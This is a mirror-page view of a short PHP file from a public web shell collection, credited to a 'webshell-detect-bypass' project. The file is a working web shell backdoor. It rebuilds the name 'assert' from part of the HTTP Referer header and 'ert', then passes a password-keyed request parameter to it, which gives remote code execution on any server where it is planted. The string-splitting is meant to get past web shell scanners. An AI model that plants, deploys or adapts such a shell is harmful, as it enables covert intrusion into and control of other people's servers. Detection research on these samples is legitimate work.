mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
32be5d26bf
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
9 lines
193 B
PHP
9 lines
193 B
PHP
<?php
|
|
/**
|
|
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
|
|
*
|
|
*/
|
|
$password = "LandGrey";
|
|
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
|
|
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
|
|
?>
|